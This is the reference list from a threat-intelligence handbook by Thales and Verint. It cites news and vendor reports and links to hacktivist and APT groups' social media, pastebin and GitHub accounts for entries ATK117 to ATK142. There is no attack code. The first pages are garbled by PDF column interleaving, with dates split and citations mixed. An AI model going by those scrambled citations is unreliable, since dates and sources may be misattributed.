0 Year-old Office Vulnerability, https://unit42.paloaltonetworks.
Hacker Group Steals GBs Worth of Sensitive Files from the com/unit42-inception-attackers-target-europe-year-old-office-
Venezuelan Military, https://www.hstoday.us/subject-matter-areas/ vulnerability/
cybersecurity/secretive-machete-hacker-group-steals-gbs-worth-
of-sensitive-files-from-the-venezuelan-military/  2/08/2019, Kaspersky, Recent Cloud Atlas activity, https://
1
securelist.com/recent-cloud-atlas-activity/92016/
219
References _

ATK117 ATK124
 5/01/2018, TrendMicro, New KillDisk Variant Hits Financial
1  8/2019, Know Your Meme, Chuckling Squad Hacks, https://
0
Organizations in Latin America, https://blog.trendmicro.com/ knowyourmeme.com/memes/events/chuckling-squad-hacks
trendlabs-security-intelligence/new-killdisk-variant-hits-financial-
31/08/2019, BBC, Twitter CEO and co-founder Jack Dorsey has
organizations-in-latin-america/
account hacked, https://www.bbc.com/news/technology-49532244
 2/06/2018, Bluvector, Lazarus Group Uses KillDisk as a
1
30/08/2019, BBC, Twitter C.E.O. Jack Dorsey’s Account Hacked,
Distraction for SWIFT Attacks, https://www.bluvector.io/threat-
https://www.nytimes.com/2019/08/30/technology/jack-dorsey-
report-lazarus-group-killdisk-swift/
twitter-account-hacked.html
 3/10/2018, FireEye, APT38: Un-Usual Suspects, https://content.
0
24/08/2019, BBC, After Shane Dawson, Hackers Come For
fireeye.com/apt/rpt-apt38
James Charles, https://dankanator.com/26229/after-shane-
 5/08/2019, Reuters, North Korea took $2 billion in cyberattacks
0 dawson-hackers-james-charles/
to fund weapons program: U.N. report, https://www.reuters.com/
article/us-northkorea-cyber-un/north-korea-took-2-billion-in-cyber- ATK125
attacks-to-fund-weapons-program-u-n-report-idUSKCN1UV1ZX https://twitter.com/iznaye
ATK120 https://twitter.com/Baronnet_Noir
Dragos, HEXANE, https://dragos.com/resource/hexane/ https://twitter.com/xslncd
 7/08/2019, Dell Secureworks, LYCEUM Takes Center Stage
2 https://twitter.com/MrWolf03683135
in Middle East Campaign, https://www.secureworks.com/blog/
14/04/2019, Defcon-lab, Hacktivismo – OpEcuador – Continuação
lyceum-takes-center-stage-in-middle-east-campaign
(2), https://www.defcon-lab.org/hacktivismo-opecuador-
 7/08/2019, Threat Post, Oil and Gas Firms Targeted By New
2 continuacao-2/
LYCEUM Threat Group, https://threatpost.com/oil-and-gas-firms-
14/04/2019, Defcon-lab, Hacktivismo – OpEcuador – Continuação
targeted-by-new-lyceum-threat-group/147705/
(3), https://www.defcon-lab.org/hacktivismo-opecuador-
continuacao-3/
ATK121
https://twitter.com/CyberGhost404 01/05/2019, Rogue Media Labs, xS1lenc3d of Iznaye Dumps
+70,000 Customer Emails Online Following Attack on The Forums
https://www.youtube.com/channel/UCqMhJooh1DU1eegH5jSv5gQ of Peugeot France , https://roguemedialabs.com/2019/05/01/
 8/04/2019, Records from Over Two Dozens Local Police
1 xs1lenc3d-of-iznaye-dumps-70000-customer-emails-online-
Departments Across The UK Hacked & Leaked Online by following-attack-on-the-forums-of-peugot-france/
CyberGhost404, https://roguemedialabs.com/2019/04/18/
records-from-over-two-dozens-local-police-departments-across- ATK126
the-uk-hacked-leaked-online-by-cyberghost404/ English Dark-Web Forum
06/08/2019, Vietnamnet, Hacker Phillippines tấn công
web Việt Nam, trả đũa việc bị mất Facebook, https:// ATK127
vietnamnet.vn/vn/cong-nghe/bao-mat/hacker-phillippines-tan- https://twitter.com/DemonSad3
cong-web-viet-nam-tra-dua-viec-bi-mat-facebook-556466.html https://www.youtube.com/channel/UCACXA7rvIHzSksCzsH-ED2Q
ATK122 https://pastebin.com/u/DemonSad3
https://www.facebook.com/Anonymous-ARG-448319398567509
ATK128
https://www.facebook.com/OperationArgentina/  6/06/2016, Tech Crunch, Zuckerberg’s Twitter, Pinterest,
0
https://by-clips.com/channel/UCh52_wDpwZP4tXp97XtKAqg LinkedIn accounts hacked, https://techcrunch.com/2016/06/06/
zuckerbergs-twitter-pinterest-linkedin-accounts-hacked/
https://www.youtube.com/channel/UCSWZ7Q6v6Q7Bi-NymMabCIA
2 7/06/2016, Venture Beat, OurMine hacks Google CEO
https://twitter.com/anonymouswararg Sundar Pichai’s Quora and Twitter accounts , https://venturebeat.
https://twitter.com/AnonymousArgOfi com/2016/06/27/ourmine-hackers-break-into-google-ceo-
sundar-pichais-quora-and-twitter-accounts/
ATK123 14/07/2016, Hacked, Hacking Group OurMine Claim HSBC
https://twitter.com/Anon_ITA Servers Takedown, https://hacked.com/hacking-group-ourmine-
claim-hsbc-servers-takedown/
https://twitter.com/OperationItaly
1 8/07/2016, International Business Times, ‘Pokemon Go’
https://twitter.com/Anon_Otherwise
Servers Brought Down By OurMine DDoS Attack, https://www.
https://www.anon-italy.blogspot.it/ ibtimes.com/pokemon-go-servers-brought-down-ourmine-ddos-
attack-2392273
https://www.youtube.com/channel/UCicIdxizhftaMDXljKPRKRg
26/07/2016, Gizmodo, The Group That Hacked Mark Zuckerberg
http://f7qiyb3e7h2cp3ku.onion
Is Now Going After News Sites, https://gizmodo.com/the-group-
 1/05/2015, La Stampa, Il blitz della postale contro Anonymous:
2 that-hacked-mark-zuckerberg-is-now-going-afte-1784308701
i dettagli, https://www.lastampa.it/tecnologia/2015/05/21/news/
28/08/2016, BuzzFeed, Hackers Gain Access To Uber CEO
il-blitz-della-postale-contro-anonymous-i-dettagli-1.35264323
Travis Kalanick’s Twitter, https://www.buzzfeednews.com/
 1/12/2018, Edoardo Limone, Cyber Attacchi in Italia: un
1 article/josephbernstein/hackers-gain-access-to-uber-ceo-travis-
calendario e tante riflessioni, https://www.edoardolimone. kalanicks-twitter
com/blog/2018/12/11/cyber-attacchi-in-italia-un-calendario-
04/10/2016,BuzzFeed , This Saudi Teen Is Probably Behind The
e-tante-riflessioni/
Hacks Of Dozens Of Tech CEOs And Celebrities, https://www.
buzzfeednews.com/article/josephbernstein/this-saudi-teen-is-
probably-behind-the-hacks-of-dozens-of-te

220 The Cyberthreat Handbook • Thales - Verint


 5/10/2016, The Guardian, BuzzFeed hacked by OurMine after it
0  6/04/2019, Blogger Engineer, Pinoy LulzSec continues annual
0
claimed to unmask one of its members, https://www.theguardian. #AprilLulz tradition, http://bloggerengineer.com/pinoy-lulzsec-
com/technology/2016/oct/05/buzzfeed-hack-ourmine-ahmad- continues-annual-aprillulz-tradition/
makki-facebook-google
 5/04/2019, Blogger Engineer, Pinoy LulzSec hacks CebPac’s
2
 1/12/2016, CNET, The NFL just got hacked on Twitter, https://
2 GetGo; warns large data breach, http://bloggerengineer.com/
www.cnet.com/news/nfl-hack-twitter-ourmine/ pinoy-lulzsec-hacks-cebpacs-getgo-warns-large-data-breach/
 7/08/2017, Gizmodo, Helpless HBO Gets Wrecked by Hackers
1  0/04/2019. Blogger Engineer, Hackers compromise websites of
3
Yet Again, https://gizmodo.com/helpless-hbo-gets-wrecked-by- Philippine Army, AFPSLAI, http://bloggerengineer.com/hackers-
hackers-yet-again-1797923587 compromise-websites-of-philippine-army-afpslai/
 1/08/2017, HackRead, WikiLeaks official website hacked by
3
OurMine hacking group, https://www.hackread.com/wikileaks- ATK130
official-website-hacked-ourmine-hacking-group/ https://twitter.com/fallaga_team
 5/09/2017, Gizmodo, Welp, Vevo Just Got Hacked, https://
1 https://www.facebook.com/Official.Fallaga/
gizmodo.com/welp-vevo-just-got-hacked-1813390834  0/01/2015, Nawaat, Fellagas: an Interview with Tunisia’s
1
https://www.ourmine.org/ Islamists hackers, https://nawaat.org/portail/2015/01/10/
fellagas-an-interview-with-tunisias-islamits-hackers/
ATK129  5/01/2015, Security Week, Notepad++ Site Hacked in
1
https://twitter.com/Pinoy_LulzSec Response to “Je suis Charlie” Edition, https://www.securityweek.
com/notepad-site-hacked-response-%E2%80%9Cje-suis-
https://twitter.com/PinoyLulzSec
charlie%E2%80%9D-edition
https://twitter.com/PinoyLulzSec__ (suspended since April 2019)
 5/01/2015, Mashable, France: 19,000 Websites Hacked Since
1
https://www.facebook.com/LulzsecPH/ Charlie Hebdo Attack, https://mashable.com/2015/01/15/
france-cyberattacks-charlie-hebdo/
https://www.facebook.com/Pinoy-LulSec-163230157452851/
 6/01/2015, MEMRI, Pro-ISIS, Other Muslim Hackers Declare
1
https://www.facebook.com/groups/Anonymous.Phi/
Cyber Jihad; Under #OpFrance, 20,000 French Websites
https://www.youtube.com/channel/UC-R3BjsiBbRi44uPQsD64tw Attacked, Including Gov ’t, Military; Hackers, Supporters
Celebrate On Twitter: Mocking Pope, Statue Of Liberty, ‘Coming
http://www.zone-h.org/archive/notifier=Pinoy%20Lulzsec%20
To Crush The Cross’ And ‘Your Freedom,’ Tweeting Images
-%20GrandFather
From ISIS Beheadings, http://cjlab.memri.org/lab-projects/
https://zone-h.com/archive/notifier=X-m3n?hz=1 monitoring-jihadi-and-hacktivist-activity/online-cyber-jihad-
declared-by-pro-isis-and-other-muslim-hackers-20000-french-
http://www.zone-h.org/archive/notifier=kangk0ng
websites-attacked-as-part-of-opfrance-including-government-
 2/04/2018, Blogger Engineer, Pinoy LulzSec hacks multiple
0 military-websites-hackers-and-supporters-celebrate-on-twit/
PH websites for April Lulz 2018, http://bloggerengineer.com/
 5/02/2015, MEMRI, Fallaga Team – Tunisian Hacker Group
0
pinoy-lulzsec-hacks-multiple-ph-websites-for-april-lulz-2018/
Engages In Jihadi Hacktivism, Active On Twitter, Facebook,
 3/04/2018, Manila Bulletin, Filipino Black Hat Hackers Attack
0 YouTube, http://cjlab.memri.org/lab-projects/monitoring-jihadi-
Dozens of Websites, https://technology.mb.com.ph/2018/04/03/ and-hacktivist-activity/fallaga-team-tunisian-hacker-group-
filipino-black-hat-hackers-attack-dozens-of-websites/ engages-in-jihadi-hacktivism-active-on-twitter-facebook-youtube/
 2/04/2018, Blogger Engineer, Pinoy Lulzsec hacks 2 LGUs,
2  4/02/2015, MEMRI, 6 Members Of Fallaga Team Hacker
2
1 state university websites, http://bloggerengineer.com/pinoy- Group Arrested By Tunisian Authorities Over #OpFrance, http://
lulzsec-hacks-2-lgus-1-state-university-websites/ cjlab.memri.org/lab-projects/monitoring-jihadi-and-hacktivist-
activity/6-members-of-fallaga-team-hacker-group-arrested-by-
 4/05/2018, Blogger Engineer, Pinoy LulzSec defaces DepEd
1
tunisian-authorities-over-opfrance/
Angeles City website on Election Day, http://bloggerengineer.com/
pinoy-lulzsec-defaces-deped-angeles-city-website-on-election-day/  5/03/2015, Softpedia, Cyber Caliphate Hackers Deface
2
600 Russian Internet Resources, https://news.softpedia.com/
 9/05/2018, Blogger Engineer, Pinoy LulzSec defaces Phil-Nippon
2
news/Cyber-Caliphate-Hackers-Deface-600-Russian-Internet-
Technical College’s website, http://bloggerengineer.com/pinoy-
Resources-476718.shtml
lulzsec-defaces-phil-nippon-technical-colleges-website/
 2/04/2015, SenseCy, LOIC Fallaga, https://blog.sensecy.com/
0
 6/06/2018, Blogger Engineer, X-m3n hacks Cherry Mobile,
2
tag/loic-fallaga/
http://bloggerengineer.com/x-m3n-hacks-cherry-mobile/
 3/04/2015, DW, Hackers Target Belgian Press Group, Days
1
 3/07/2018, Blogger Engineer, Pinoy LulzSec hacks Steve Dailisan’s
0
After French Cyber Attack, https://www.dw.com/en/hackers-target-
Facebook, Instagram accounts, http://bloggerengineer.com/
belgian-press-group-days-after-french-cyber-attack/a-18377452-0
pinoy-lulzsec-hacks-steve-dailisans-facebook-instagram-accounts/
 5/07/2015, Irish Mirror, Fallaga Team: Islamist Group Hacks
1
 0/07/2018, Blogger Engineer, PH NGO certification body
2
Websites of Dublin Gyms to Display Sick Images, https://www.
gets hacked, http://bloggerengineer.com/ph-ngo-certification-
irishmirror.ie/news/irish-news/fallaga-team-islamist-group-
body-gets-hacked/
hacks-6084850
 0/09/2018, Blogger Engineer, X-m3n Hacks Jollibee Subdomain,
1
 5/08/2015, Asian Correspondent, Islamist Hacker Group
2
http://bloggerengineer.com/x-m3n-hacks-jollibee-subdomain/
Attacks Thai Government Websites, https://asiancorrespondent.
 5/10/2018, Blogger Engineer, Hackers deface CLSU, UPHSL
1 com/2015/08/islamist-hacker-group-attacks-thai-government-
websites, http://bloggerengineer.com/hackers-deface-clsu- websites/
uphsl-websites/
 1/09/2015, Politico, Hackers Attack Hungarian TV Station,
1
 1/04/2019, Manila Bulletin, Pinoy LulzSec Stages April Lulz
0 https://www.politico.eu/article/hackers-attack-hungarian-tv-
Hacking Event, https://technology.mb.com.ph/2018/04/03/ station-petra-laszlo-fallaga-team/
pinoy-lulzsec-stages-april-lulz-hacking-event/

221
References _

 7/01/2017, SBS News, Islamist Hackers Target Australian


1 15/April/2016, ABC Australia, Pro-Islamic State cyber group
Websites, https://www.sbs.com.au/news/islamist-hackers-target- hack websites of Australian small businesses, https://www.abc.
australian-websites net.au/news/2016-04-15/pro-islamic-state-cyber-group-hack-
websites-of-small-businesses/7329858
 7/02/2017, Independent, Isis-linked Hackers Attack NHS
0
Websites to Show Gruesome Syrian Civil War Images, https:// 04/April/2017, Newsweek, ISIS-LINKED CYBER GROUP RELEASES
www.independent.co.uk/news/uk/crime/isis-islamist-hackers- ‘KILL LIST’ OF 8,786 US TARGETS FOR LONE WOLF ATTACKS,
nhs-websites-cyber-attack-syrian-civil-war-images-islamic- https://www.newsweek.com/isis-linked-cyber-group-releases-kill-
state-a7567236.html list-8786-us-targets-lone-wolf-attacks-578765
06/July/2017, Dark Reading, Hacking the State of the ISIS Cyber
ATK131 Caliphate, https://www.darkreading.com/perimeter/hacking-the-
https://twitter.com/RussianSec_171 state-of-the-isis-cyber-caliphate-/d/d-id/1329293
 4/08/2019, YouTube, Cmd feito com ferramentas HACKING!!!
1 12/March/2018, HELLENIC INSTITUTE OF STRATEGIC STUDIES,
#RussianSecTeam… (SEGUINTE LEIA A DESC), https://www. From Terrorism to Cyber-terrorism: The Case of ISIS, https://papers.
youtube.com/watch?v=LG08rvuxcqQ ssrn.com/sol3/papers.cfm?abstract_id=3135927
ATK132 09/July/2018, The Jerusalem Post, EXCLUSIVE: ISLAMIC CYBER
TERRORISTS TRYING TO TARGET INFRASTRUCTURE, https://
 4/07/2013, Malwarebytes Lab, Syrian Electronic Army Hacks
2 www.jpost.com/Arab-Israeli-Conflict/Exclusive-Islamic-cyber-
Tango and Viber Servers, https://blog.malwarebytes.com/ terrorists-trying-to-target-infrastructure-562052
cybercrime/2013/07/syrian-electronic-army-hacks-tango-and-
viber-servers/ 18/October/2018, Brica, #1233567: Cyber Caliphate Team
launch cracking software called “Multy BruteForce Facebook”.,
 6/02/2014, The Hacker News, Facebook domain hacked by
0 https://brica.de/alerts/alert/public/1233567/cyber-caliphate-
Syrian Electronic Army, https://thehackernews.com/2014/02/ team-launch-cracking-software-called-multy-bruteforce-facebook/
facebook-domain-hacked-by-syrian.html
09/January/2019, Business Risk Intelligence & Cyberthreat Awareness,
 2/06/2014, medium, How Reuters got compromised by the
2 #1242740: New year… new hacking group operating under
Syrian Electronic Army, https://medium.com/@FredericJacobs/the- the umbrella of the ISIS Global Hacking Division., https://brica.
reuters-compromise-by-the-syrian-electronic-army-6bf570e1a85b de/alerts/alert/public/1242740/new-year-new-hacking-group-
 9/08/2014, FireEye, Connecting the Dots: Syrian Malware
2 operating-under-the-umbrella-of-the-isis-global-hacking-division/
Team Uses BlackWorm for Attacks, https://www.fireeye.com/blog/ 16/July/2019, Site Intelligence, ACCA CLAIMS HACKING 150
threat-research/2014/08/connecting-the-dots-syrian-malware- TWITTER ACCOUNTS, https://ent.siteintelgroup.com/Dark-Web-
team-uses-blackworm-for-attacks.html and-Cyber-Security/acca-claims-hacking-150-twitter-accounts.html
 7/11/2014, Reuters, Western media websites hacked by Syrian
2
Electronic Army, https://www.reuters.com/article/us-syria-crisis- ATK134
hack/western-media-websites-hacked-by-syrian-electronic-army-  9/05/2019, AdvIntel, Top-Tier Russian Hacking Collective
0
idUSKCN0JB1HM20141127 Claims Breaches of Three Major Anti-Virus Companies, https://
 1/01/2015, The Telegraph, Le Monde hacked: ‘Je ne suis pas
2 www.advanced-intel.com/post/top-tier-russian-hacking-collective-
Charlie’ writes Syrian Electronic Army, https://www.telegraph. claims-breaches-of-three-major-anti-virus-companies
co.uk/news/worldnews/europe/france/11359732/Le-Monde- 1 3/05/2019, BleepingComputer, Fxmsp Chat Logs Reveal
hacked-Je-ne-suis-pas-Charlie-writes-Syrian-Electronic-Army.html the Hacked Antivirus Vendors, AVs Respond, https://www.
 3/04/2015, Vice, The Syrian Electronic Army’s Most Dangerous
0 bleepingcomputer.com/news/security/fxmsp-chat-logs-reveal-
Hack, https://www.vice.com/en_us/article/nze5nk/the-syrian- the-hacked-antivirus-vendors-avs-respond/
electronic-armys-most-dangerous-hack 13/05/2019, CBR, Trend Micro Admits it Was Hacked; Symantec
 3/08/2015, Krebs on security, Washington Post Site Hacked
1 Denies Claims of “Fxmsp” Breach, https://www.cbronline.com/
After Successful Phishing Campaign, https://krebsonsecurity. news/trend-micro-symantec-fxmsp
com/2013/08/washington-post-site-hacked-after-successful- 13/05/2019, BleepingComputer, New Details Emerge of Fxmsp’s
phishing-campaign/ Hacking of Antivirus Companies, https://www.bleepingcomputer.
 5/12/2018, Forbes, Syrian Electronic Army Hackers Are Targeting
0 com/news/security/new-details-emerge-of-fxmsps-hacking-of-
Android Phones With Fake WhatsApp Attacks, https://www.forbes. antivirus-companies/
com/sites/thomasbrewster/2018/12/05/syrian-electronic-army- 14/05/2019, SCMagazine, Anti-virus vendors named in Fxmsp’s
hackers-are-targeting-android-phones-with-fake-whatsapp-attacks/ alleged source code breach respond, https://www.scmagazine.
com/home/security-news/anti-virus-vendors-named-in-fxmsps-
ATK133 alleged-source-code-breach-respond/
 6/January/2015, NY Daily News, FBI investigates ISIS hacker
0 20/05/2019, Asahi Shimbun, Trend Micro says its computer
group Cyber Caliphate following a series of hacks on news network was compromised, http://www.asahi.com/ajw/articles/
organizations in Maryland, Albuquerque, https://www.nydailynews. AJ201905200036.html
com/news/national/isis-hacker-group-cyber-caliphate-hacks-
article-1.2067634 25/06/2019, CBR, Trend Micro Wraps Up Investigation into
Fxmsp Hack: Code Was “Artifacts Used for Debugging Purposes”,
 6/January/2015, The Guardian, Malaysia Airlines website hacked
2 https://www.cbronline.com/news/fxmsp-trend-micro
by ’Lizard Squad, https://www.theguardian.com/world/2015/
jan/26/malaysia-airlines-website-hacked-by-lizard-squad
ATK 135
 1/February/2015, Alann, ‫ليشيم نوددهي ةيمالسإلا ةلودلا ةنصارق‬
1 https://twitter.com/GhostSquadHack
‫اهيتنبإو امابوأ‬, https://www.alaan.cc/article/219079/
https://www.facebook.com/GhostSquadHackers/
 2/September/2015, Miror, ISIS hackers intercept top secret
1
British Government emails in major security breach uncovered https://twitter.com/H4x0Rs_Ghost666/status/1000359109114281984
by GCHQ, https://www.mirror.co.uk/news/uk-news/isis-hackers- https://www.youtube.com/channel/UC8PhMJ74E53sy9pqzf79q5w
intercept-top-secret-6428423

222 The Cyberthreat Handbook • Thales - Verint


https://www.youtube.com/watch?v=q7rwnlbH67I
https://www.youtube.com/watch?v=NpgPkrdwFkw
https://github.com/s1egesystems/GhostSquadHackers-Javascript-Encrypter-Encoder
https://github.com/s1egesystems/GhostDelivery
https://github.com/s1egesystems/RedGhost
07/01/2016, Fossbytes, Ghost Squad Hackers Hack Ethiopian Websites In Response To Killing Of Protesting Students, https://fossbytes.com/ghost-squad-hackers-hack-ethiopian-website-in-response-to-killing-of-students-during-protest/
21/05/2016, HackRead, Hacktivists Shut Down Donald Trump Hotel Collections Website, https://www.hackread.com/donald-trump-hotel-collections-website-down/
23/06/2016, HackRead, Hackers Just Leaked Personal Data of US Military Officials and it's Legit, https://www.hackread.com/ghost-squad-hackers-leak-us-military-data/
31/07/2016, HackRead, Twitter Account of Afghan Chief Executive Dr. Abdullah Hacked, https://www.hackread.com/twitter-account-dr-abdullah-hacked/
02/08/2016, The Hack Today, Ghost Squad Hackers: Hacks Afghan Government in Protest of Ongoing Corruption and U.S. Drug Ties, https://thehacktoday.com/hacks-afghan-government-in-protest/
02/09/2016, Softpedia, Ghost Squad Hackers Deface 12 Afghan Government Websites, https://news.softpedia.com/news/ghost-squad-hackers-deface-12-afghan-government-websites-507900.shtml
23/09/2016, SecurityIntelligence, Dissecting a Hacktivist's DDoS Tool: Saphyra Revealed, https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/
17/10/2018, Security Affairs, Brazil expert discovers Oracle flaw that allows massive DDoS attacks, https://securityaffairs.co/wordpress/77181/hacking/oracle-flaw-ddos-attacks.html
18/10/2018, The Sun, YouTube HACKED? Cyber-attack group 'Ghost Squad' claims responsibility for today's outage, https://www.thesun.co.uk/tech/7514214/youtube-hack-ghost-squad-cyberattack-outage-down/
04/01/2019, Packt, GitHub was down first working day of 2019, hacker claims DDoS, https://hub.packtpub.com/github-was-down-first-working-day-of-2019-hacker-claims-ddos/
05/01/2019, What is DDoS, Was GitHub DDoSed On The First Working Day of 2019?, https://whatisddos.com/was-github-ddosed-on-the-first-working-day-of-2019/
19/02/2019, Geekboots, Github down due to DDoS attack, https://www.geekboots.com/news/github-down-due-to-ddos-attack

ATK136
https://twitter.com/Sprek3rsSec
https://www.defcon-lab.org/o-retorno-de-sprek3rssec/

ATK137
https://twitter.com/NewSecGroup
https://twitter.com/kamilulz/status/1091995698847993856
https://twitter.com/hashtag/DARKNESSGHOST

ATK138
https://twitter.com/moonzlinuxer
https://www.instagram.com/habilmoonz/
https://www.facebook.com/habilmoonz
http://www.zone-h.org/archive/filter=1/notifier=MrMoonz

ATK139
https://twitter.com/JTSEC3313
https://twitter.com/JTSEC1333
https://twitter.com/JTSEC1
https://pastebin.com/u/JTSEC1333

ATK140
https://twitter.com/kelvinsecteamS
https://www.facebook.com/Ksecureteam/
https://www.facebook.com/groups/1457838784279643/
http://ksecureteam.com
https://github.com/kelvinsecurity
http://kelvinsecteam.blogspot.com
https://kelvinparrasecurityinformation.blogspot.com
https://www.youtube.com/channel/UCPdzzcEi3us1TVUZqksrMrg
https://pastebin.com/u/kelvinsecteam (removed in July 2019)
09/09/2015, KelvinSecurity Team Blog, Katana Una Herramienta Para Auditoria En Tecnicas Pentest 2015 [Katana, a tool for auditing with pentest techniques, 2015], http://kelvinsecteam.blogspot.com/2015/09/katana-una-herramienta-para-auditoria.html
15/09/2015, SITE Intelligence Group, Website For North Carolina State Parks Allegedly Hacked, Databases Leaked, https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/website-for-north-carolina-state-parks-allegedly-hacked-databases-leaked.html
28/11/2015, KelvinSecurity Team Blog, RACP [TUTORIAL], http://kelvinsecteam.blogspot.com/2015/11/racp-tutorial.html
2018, InfoArmor, The Evolving Threat Landscape: Nation States, Third-Party Attacks, and the Dark Web, https://blog.infoarmor.com/security-professionals/threat-landscape-nation-states-third-party-attacks-dark-web
28/10/2018, Beyond The Perimeter, Venezuelan president's personally identifiable information available for sale, https://medium.com/beyond-the-perimeter/venezuelan-presidents-personally-identifiable-information-available-for-sale-e315ed9575e0
16/02/2019, Rogue Media Labs, Air Dominica & Costa Rican Travel Agency TourPlan.com Hacked by KelvinSec Team, Vulnerabilities & Partial Databases Leaked Online, https://roguemedialabs.com/2019/02/16/air-dominica-costa-rican-travel-agency-tourplan-com-hacked-by-kelvinsec-team-vulnerabilities-partial-databases-leaked-online/

ATK141
https://twitter.com/LorianSynaro
13/12/2018, Rogue Media Labs, Anonymous Launches #OpIcarus 2.0, https://roguemedialabs.com/2018/12/13/anonymous-launches-opicarus-2-0/
26/12/2018, Rogue Media Labs, Government of Sudan Shuts Down National Internet Access, So Anonymous Shuts Down The Government, https://roguemedialabs.com/2018/12/26/government-of-sudan-shuts-down-national-internet-access-so-anonymous-shuts-down-the-government/
19/01/2019, Rogue Media Labs, Anonymous Launches String of Coordinated Attacks In Solidarity with The People of Zimbabwe, https://roguemedialabs.com/2019/01/19/anonymous-launches-string-of-coordinated-attacks-in-solidarity-with-the-people-of-zimbabwe/
21/01/2019, iAfrikan, Lorian Synaro of Anonymous explains the motive behind #OpSudan and #OpZimbabwe, https://www.iafrikan.com/2019/01/21/lorian-synaro-of-anonymous-explains-the-motive-behind-opsudan-and-opzimbabwe/

References _

02/03/2019, Rogue Media Labs, #OpSudan: Sudan Airways Pwned by Black Water Security, Sites Entire Email Archive Dumped Online, https://roguemedialabs.com/2019/03/02/opsudan-sudan-airways-pnwed-by-black-water-security-sites-entire-email-archive-dumped-online/
07/03/2019, Rogue Media Labs, Sudan National Police, Blue Nile Television & 19 Government Ministry Websites Crashed, Hacked, Defaced and/or Erased Offline Over The Last 24 Hours, https://roguemedialabs.com/2019/03/07/sudan-national-police-blue-nile-television-station-19-government-ministry-websites-crashed-hacked-defaced-and-or-erased-offline-over-the-last-24-hours/
26/03/2019, Rogue Media Labs, #OpSudan: International Hackers Continue Onslaught Against al-Bashir & Government of Sudan, https://roguemedialabs.com/2019/03/26/opsudan-international-hackers-continue-onslaught-against-al-bashir-government-of-sudan/
06/04/2019, Rogue Media Labs, #OpSudan: Hacktivists Around The World Prepare for Massive Cyber Attacks Against The Government of Sudan, https://roguemedialabs.com/2019/04/06/opsudan-hacktivists-around-the-world-prepare-for-massive-cyber-attacks-against-the-government-of-sudan/
07/04/2019, Rogue Media Labs, #OpIsrael 2019: Anonymous Hackers Launch Annual Assault Against The Government of Israel for Their Continued Oppression of The Palestinian People, https://roguemedialabs.com/2019/04/07/opisrael-2019-anonymous-hackers-launch-annual-assault-against-the-government-of-israel-for-their-continued-oppression-of-the-palestinian-people/

ATK142
https://twitter.com/pryzraky
https://twitter.com/Pryzraky/status/1079831628107706369
https://twitter.com/xslncd
https://twitter.com/Mecz1nho
https://twitter.com/ZHacker13
https://twitter.com/1nocent
https://www.facebook.com/PryzrakyTeam
archive.fo/6VYDZ
15/12/2018, Rogue Media Labs, Central Bank of The Bahamas Crashed for +28 Hours by SHIZEN, https://roguemedialabs.com/2018/12/15/central-bank-of-the-bahamas-crashed-for-28-hours-by-shizen/
24/01/2019, Rogue Media Labs, US Cert - DHS Releases Emergency Directive In Response To Widespread "Infrastructure Tampering Campaign" Targetting US Executive Branch, https://roguemedialabs.com/2019/01/24/us-cert-dhs-releases-emergency-directive-in-response-to-widespread-infrastructure-tampering-campaign-targetting-us-executive-branch/
07/02/2019, Rogue Media Labs, Constituents of Brasilian Congressmen Jesuino Boabaid Hacked; Personal Data of Over 400 Voters Leaked Online, https://roguemedialabs.com/2019/02/07/constituents-of-brasilian-congressmen-jesuino-boabaid-hacked-personal-data-of-over-400-voters-leaked-online/
03/03/2019, Rogue Media Labs, #OpVenezuela: International Hackers Team Up As The Onslaught Against Maduro's Government Continues Into The Weekend, https://roguemedialabs.com/2019/03/03/opvenezuela-international-hackers-team-up-as-the-onslaught-against-maduros-government-continues-into-the-weekend/
04/03/2019, Rogue Media Labs, Mecz1nho Markov Takes Down US State Department 4 Other National Institutions & Government Agencies Across Venezuela, https://roguemedialabs.com/2019/03/04/mecz1nho-markov-takes-down-us-state-department-4-other-national-institutions-government-agencies-across-venezuela/
06/03/2019, DefCon Lab, Hacktivismo - OpVenezuela - Continuacao (6) [Hacktivism - OpVenezuela - Continuation (6)], https://www.defcon-lab.org/hacktivismo-opvenezuela-continuacao-6/
09/03/2019, Rogue Media Labs, Argentinian Subsecretaria de Turismo de Santiago del Estero Gobierno de Laprida & Comuna de Canada Rosquin Hacked by Al1ne3737, https://roguemedialabs.com/2019/03/09/argentinian-subsecretaria-de-turismo-de-santiago-del-estero-gobierno-de-laprida-comuna-de-canada-rosquin-hacked-by-al1ne3737/
10/03/2019, DefCon Lab, Hacktivismo - OpAlgeria [Hacktivism - OpAlgeria], https://www.defcon-lab.org/hacktivismo-opalgeria/
11/03/2019, Rogue Media Labs, Cyber Attacks Against Government of Argentina Continue On Into The Weekend, https://roguemedialabs.com/2019/03/11/cyber-attacks-against-government-of-argentina-continue-on-into-the-weekend/
11/03/2019, Rogue Media Labs, Anonymous CyberGuerilla & AnonOps IRC Launch #OpCopyWrong In Attempt To Lobby EU Parliament To Vote Against Impending Copyright Reform, https://roguemedialabs.com/2019/03/11/anonymous-cyberguerrilla-anonops-irc-launch-opcopywrong-in-attempt-to-lobby-eu-parliament-to-vote-against-impending-copyright-reform/
16/03/2019, DefCon Lab, Al1ne3737: vazamento nosso de cada dia [Al1ne3737: our daily leak], https://www.defcon-lab.org/al1ne3737-vazamento-nosso-de-cada-dia/
20/03/2019, Rogue Media Labs, 8 Government Agencies Across Colombia Hacked; Thousands of Contractors Users Administrators Employees & Personnel Exposed in Data Breaches, https://roguemedialabs.com/2019/03/20/8-government-agencies-across-colombia-hacked-thousands-of-contractors-users-administrators-employees-personnel-exposed-in-data-breaches/
23/03/2019, Rogue Media Labs, Pryzraky Group Members Hack 19 Websites Across 6 Countries In Less Than 48 Hours Time, https://roguemedialabs.com/2019/03/23/pryzraky-group-members-hack-19-websites-across-6-countries-in-less-than-48-hours-time/
24/03/2019, DefCon Lab, WeekLeaks (11) 2019, https://www.defcon-lab.org/weekleaks-11-2019/
26/03/2019, Rogue Media Labs, #OpSudan: International Hackers Continue Onslaught Against al-Bashir & Government of Sudan, https://roguemedialabs.com/2019/03/26/opsudan-international-hackers-continue-onslaught-against-al-bashir-government-of-sudan/
01/04/2019, Rogue Media Labs, Conselho Nacional de Justica Wholly Pwned by Al1ne3737 - 94 Site Databases 53270 Individuals Compromised by The Data Breach, https://roguemedialabs.com/2019/04/01/conselho-nacional-de-justica-wholly-pwned-by-al1ne3737-94-site-databases-53270-individuals-compromised-by-the-data-breach/
